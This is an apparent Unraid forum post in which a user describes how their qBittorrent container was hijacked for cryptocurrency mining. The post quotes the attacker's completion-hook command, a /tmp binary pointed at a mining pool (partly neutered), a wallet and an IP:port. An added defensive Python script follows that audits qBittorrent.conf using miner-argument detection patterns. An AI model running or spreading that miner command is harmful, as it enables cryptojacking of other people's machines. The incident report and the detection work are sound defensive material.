I was away from home last night, and when I came back from work today, I noticed that my CPU was nearly maxed out. This was odd, but does happen sometimes. However, I went into my torrent client (qBittorrent), and found that all of my torrents had been deleted and had been replaced with a single torrent for some kind of Italian music.
It should go without saying that I have never heard of this music nor did I seek it out. I went into my logs for qbt, and found the following:
I have no idea what those ports I circled are; I have never used them to my knowledge. I also found in my settings that some code was marked to be executed upon completion of the torrent:
/tmp/x -o pool.suppo[CODE NEUTER]rtxmr.com:443 -u 8C2GLAN7wPEDE7xAiCLYBwdPtjc3B5pWH[CODE NEUTER]44989qMTmwSjbKmm2Y1Zog9UJWchsnrkjF4qkr7CbCtUAS4QGWyxhRW7Vfg5RZ -k --tls -o 107.173.34.104:9090
The [CODE NEUTER]s were added by me to prevent any accidental activation.
Furthermore, the logs Unraid gives me for qbt show this:
All in all, I take this to mean that someone hijacked my system to run some kind of mining software. I can see in the logs here that the line of code to be run on completion was changed a few times; I assume this was the hacker setting up their system.
I've already done what I can to stop any further access and stop any illicit activity, but I'm worried about making sure there isn't any lasting damage or compromise. I am not very well versed with this stuff, so I would appreciate any suggestions.
I have attached my diag file (tower-diagnostics-20210830-1839.zip):
https://forums.unraid.net/applications/core/interface/file/attachment.php?id=125259&key=7d5b734ea2581f6305efd6e1c07edb66
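One way to check a qBittorrent install for the abused "run external program on completion" hook described in the post above, as an added example that is not part of the original post. It assumes qBittorrent.conf stores the hook in an [AutoRun] section with enabled and program keys (adjust if your version differs); the two sample configs are constructed, with the pool and wallet replaced by placeholders.

```python
"""Added example: audit a qBittorrent.conf for a hijacked completion hook.
Assumption: the hook lives in an [AutoRun] section with 'enabled' and
'program' keys, as qBittorrent 4.x writes it."""
import configparser
import re

# Heuristics for a hijacked hook: an executable dropped in a scratch
# directory, and argument patterns typical of a CPU-miner launch line
# (pool endpoint after -o, long wallet string after -u, a TLS flag).
SUSPICIOUS_PATHS = re.compile(r"^(/tmp/|/dev/shm/|/var/tmp/)")
MINER_ARGS = re.compile(r"(\s-o\s+\S+:\d+|\s-u\s+\S{40,}|\s--tls\b)")


def audit_autorun(conf_text: str) -> list[str]:
    """Return findings for the AutoRun section; an empty list means clean."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(conf_text)
    findings: list[str] = []
    if not cfg.has_section("AutoRun"):
        return findings
    enabled = cfg.get("AutoRun", "enabled", fallback="false").lower() == "true"
    program = cfg.get("AutoRun", "program", fallback="").strip()
    if not enabled or not program:
        return findings
    findings.append(f"AutoRun is enabled: {program}")
    if SUSPICIOUS_PATHS.match(program):
        findings.append("program lives in a scratch directory (/tmp, /dev/shm, /var/tmp)")
    if MINER_ARGS.search(program):
        findings.append("arguments resemble a miner launch line (-o pool:port / -u wallet / --tls)")
    return findings


# Constructed samples: one config with a replaced hook (placeholders instead
# of the real pool and wallet), one with the hook switched off.
HIJACKED_CONF = """[AutoRun]
enabled=true
program=/tmp/x -o POOL_PLACEHOLDER:443 -u WALLET_PLACEHOLDER_0123456789abcdefghijklmnopqrstuvwxyz -k --tls
"""
CLEAN_CONF = """[AutoRun]
enabled=false
program=
"""

if __name__ == "__main__":
    for name, conf in (("hijacked", HIJACKED_CONF), ("clean", CLEAN_CONF)):
        print(name, audit_autorun(conf) or ["no findings"])
```

On Unraid the file sits inside the container's appdata share; run the audit against a copy of it rather than the live file while the container is stopped.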